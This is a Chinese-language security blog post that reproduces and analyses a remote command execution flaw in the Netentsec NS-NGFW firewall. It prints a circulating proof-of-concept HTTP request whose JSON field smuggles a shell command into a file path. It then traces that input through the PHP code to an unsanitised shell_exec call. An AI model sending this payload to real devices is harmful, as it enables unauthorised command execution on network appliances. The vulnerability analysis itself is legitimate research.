c1ay's blog

2021HW总结-网康NS-NGFW rce复现分析

漏洞复现
字数统计: 685阅读时长: 3 min
2021/04/29 Share

流传的POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST /directdata/direct/router HTTP/1.1
Host: xxx
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 160
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami>/var/www/html/11.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

漏洞分析

根据目录结构可以看出开发使用了Zend Freamwork php框架

根据请求路由/directdata/direct/router定位到漏洞的入口位置:

applications/directdata/controllers/DirectController.phprouterAction方法

mark

跟进这里Ext_Direct类的静态方法run函数:Ext_Direct::run($this->getRequest())

applications/Models/Ext/Direct.php当中

mark
mark

继续跟进这里run方法当中的Ext_Direct_Request::factory($request)

于是跟踪到了applications/Models/Ext/Direct/Request.php当中

mark

这里通过file_get_contents('php://input')对POST过来的数据进行了接收,根据上面的POC可以得知这里接收的内容为:

1
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami>/var/www/html/11.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

把这串数据的json_decode打印出来看看是什么:

mark

可以看到经过json_decode处理后的数据为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
object(stdClass)#1 (6) {
 ["action"]=>
 string(15) "SSLVPN_Resource"
 ["method"]=>
 string(11) "deleteImage"
 ["data"]=>
 array(1) {
   [0]=>
   object(stdClass)#2 (1) {
     ["data"]=>
     array(1) {
       [0]=>
       string(47) "/var/www/html/d.txt;whoami>/var/www/html/11.txt"
     }
   }
 }
 ["type"]=>
 string(3) "rpc"
 ["tid"]=>
 int(17)
 ["f8839p7rqtj"]=>
 string(1) "="
}

所以获取到$data变量当中的数据符合下面这段代码

1
2
3
4
5
6
7
8
if (
		is_object($data) && $data->type && $data->tid && 
		$data->action && $data->method
	)
	return new Ext_Direct_Request(
		$data->type, $data->tid, $data->action, 
		$data->method, $data->data
	);

这里主要根据获取到的数据对Ext_Direct_Request对象进行初始化,然后作为Ext_Direct_Request::factory($request)的返回值

applications/Models/Ext/Direct/Request.php

mark

最终在执行到applications/Models/Ext/Direct.php当中的run函数的call_user_func_array处,调用了SSLVPN_Resource类的deleteImage方法,传入的参数为:

1
2
3
4
5
6
7
8
9
10
array(1) {
   [0]=>
   object(stdClass)#2 (1) {
     ["data"]=>
     array(1) {
       [0]=>
       string(47) "/var/www/html/d.txt;whoami>/var/www/html/11.txt"
     }
   }
 }

定位到SSLVPN_Resource类的相关代码,追踪到applications/Models/SSLVPN/Resource.php当中的deleteImage方法:

mark

这里传入的$params变量内容为:

1
2
3
4
5
6
7
object(stdClass)#2 (1) {
  ["data"]=>
  array(1) {
    [0]=>
    string(47) "/var/www/html/d.txt;whoami>/var/www/html/11.txt"
  }
}

最终在执行shell_exec的时候,可控输入/var/www/html/d.txt;whoami>/var/www/html/11.txt被拼接入$cmd参数,产生了命令执行

原文作者:c1ay

原文链接:https://c1aysec.github.io/2021/04/29/2021HW总结-网康NS-NGFW rce复现分析/

发表日期:April 29th 2021, 11:26:56 am

更新日期:April 29th 2021, 8:59:10 pm

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 流传的POC
  2. 2. 漏洞分析
Total : 55
2017
Invalid date
2021
2020
2019
2018
Invalid date
2018
Invalid date
2018
Invalid date
Invalid date
2017
Invalid date
Invalid date
Invalid date
2017
ctf Apache dvwa学习 dns劫持 漏洞利用 漏洞挖掘 代码审计 burpsuite Hexo wifi破解 漏洞分析 python 算法 Linux sql注入 渗透测试 exp编写 反弹shell ssrf 漏洞复现 文件上传 免杀学习
ctf 安全加固 web安全 内网渗透 漏洞挖掘 代码审计 工具使用 其他 无线安全 漏洞分析 python编程 Linux渗透 渗透测试 漏洞复现 免杀学习